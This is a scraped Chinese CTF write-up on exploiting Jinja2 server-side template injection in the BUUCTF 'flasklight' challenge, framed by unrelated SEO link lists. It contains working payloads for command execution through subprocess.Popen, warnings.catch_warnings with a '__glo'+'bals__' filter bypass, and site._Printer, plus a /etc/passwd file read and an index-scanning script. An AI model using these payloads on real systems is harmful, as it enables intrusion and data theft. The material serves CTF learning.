当前位置: 首页 > news >正文

广东湛江网站建设呼叫中心网站建设

广东湛江网站建设,呼叫中心网站建设,wordpress 5.0.2编辑器,成都创新互联做网站目录 subprocess.Popen FILE warnings.catch_warnings site._Printer 这题很明显就是 SSTI了 源代码 我们试试看 {{7*7}} 然后我们就开始吧 原本我的想法是直接{{url_for.__globals__}} 但是回显是直接500 猜测过滤 我们正常来吧 {{"".__class__}} 查看当前…

目录

subprocess.Popen

FILE

warnings.catch_warnings

site._Printer



这题很明显就是 SSTI了

源代码

我们试试看

{{7*7}}

然后我们就开始吧

原本我的想法是直接{{url_for.__globals__}}

但是回显是直接500 猜测过滤 我们正常来吧

{{"".__class__}}  查看当前情况{{"".__class__.__base__}} 查看基类 这里发现没有利用的 我们修改代码{{"".__class__.__mro__}}  查看全部类  发现存在<type 'object'>了{{"".__class__.__mro__[2].__subclasses__()}}  查看object的子类

这里我们需要 os 来调用

但是这里存在一个类 可以不需要os

subprocess.Popen

Python3 subprocess | 菜鸟教程

需要参数

("命令",shell=True,stdout=-1)这里 stdout  就是指定输出 PIPE

然后我们可以使用 其方法来进行交互

("命令",shell=True,stdout=-1).communicate()

这样我们就可以实现rce

首先通过 脚本跑出来其的位数

import timeimport  requestsbase_url="http://1a3ad76d-35d3-4a35-97fb-8997c87bf989.node4.buuoj.cn:81/?search="for i in range(300):payload="{{\"\".__class__.__mro__[2].__subclasses__()[%s]}}"%ir = requests.get(url=base_url + payload)if "subprocess.Popen" in r.text:print(i)if r.status_code == 429:time.sleep(0.5)

跑出来是258

我们开始构造

?search={{''.__class__.__mro__[2].__subclasses__()[258]("ls",shell=True,stdout=-1).communicate()[0].strip()}}最后的.communicate()[0].strip() 通过 communicate方法 输出 并且指定数组 去除空白符

我们看看 flasklight看看

?search={{''.__class__.__mro__[2].__subclasses__()[258]("cat /flasklight/coomme_geeeett_youur_flek",shell=True,stdout=-1).communicate()[0].strip()}}

FILE

这是另一个方法 通过file读取文件

首先我们要测试一下

先查找一下 file

发现是40

然后我们看看

{{"".__class__.__mro__[2].__subclasses__()[40]}}
/?search={{"".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read()}}

读取成功

然后我们去读一下命令行吧

发现读出了路径

我们看看这个py

但是还是没有办法直接读取出来 因为不知道flag的文件名字

warnings.catch_warnings

我们首先找一下这个类的位数

59

{{"".__class__.__mro__[2].__subclasses__()[59].__init__}}

这里就卡住了 因为我们还是需要 globals的参与

我们如何绕过过滤呢

{{"".__class__.__mro__[2].__subclasses__()[59].__init__['__glo'+'bals__']}}

这样就可以

我们在上面也知道 是通过匹配过滤的

做到这个我们其实就可以正常rce了 但是还是完善一下这个类的用法吧

这里我们能发现 这个类没有加载 os 需要我们手动加载

我们需要在其

['__builtins__']['eval']

 下导入

payload

?search={{"".__class__.__mro__[2].__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

这样就借助 os 实现了 rce

site._Printer

我们知道了 globals可以拼接绕过

这个方法也可以实现我们看看里面是否内置了 os

?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__['__glo'+'bals__']}}

发现存在 我们直接rce即可

?search={{"".__class__.__mro__[2].__subclasses__()[71].__init__['__glo'+'bals__']['os'].popen('ls').read()}}

最后读取即可

http://www.yayakq.cn/news/674509/

相关文章:

  • 西部数码网站管理助手 xpwordpress钩子大全
  • 网站建设 微信公众号怎么在自己电脑上做网站
  • 优秀网站网页设计分析九一人才网找工作
  • 无锡网站建设收费互联网公司包括
  • 东莞做微网站人力资源六大模块
  • 青岛模板化网站牡丹江商城网站开发设计
  • 小网站开发建设银行app忘记登录密码
  • 网站建设原理与实践wordpress 生成页面
  • 网站建设上海基于html5的旅游网站的设计
  • 北京网站开发费用网站开发项目实例
  • 江苏省城乡和住房建设厅网站鞋子网站建设策划书
  • 网站建设优化的作用互联网资源整合平台
  • 深圳福田华丰大厦网站建设2023年10月爆发新冠
  • 做1688网站需要懂英语吗秦皇岛网站建设企业
  • 代理记账 营销型网站什么是做网站
  • 天津开发区建网站公司如何做地方网站推广
  • 网站开发网站页面做网站做手机app要学什么软件
  • 网站建设 投标景观设计公司利润
  • 文化馆门户网站建设的作用及意义做网站电脑配置要求个高吗
  • 花生壳做网站wordpress 更换域名
  • 账号注册网站微信红包开发平台
  • 网站做支付宝支付接口建设企业网站登录901
  • 涿州网站建设有限公司做旅游网站的意义
  • 韶关网站制作建网站衡水哪家强?
  • 群晖wordpress建站教程中国建设银行官网个人网上银行
  • 旅游网站建设公司福步外贸论坛招聘
  • 安康市劳务公司优化网站排名解析推广
  • 网站的ip地址是什么连云港公司网站优化服务
  • 上海门户网站开发杭州seo优化
  • 如何做网站本地服务器wordpress能用的插件吗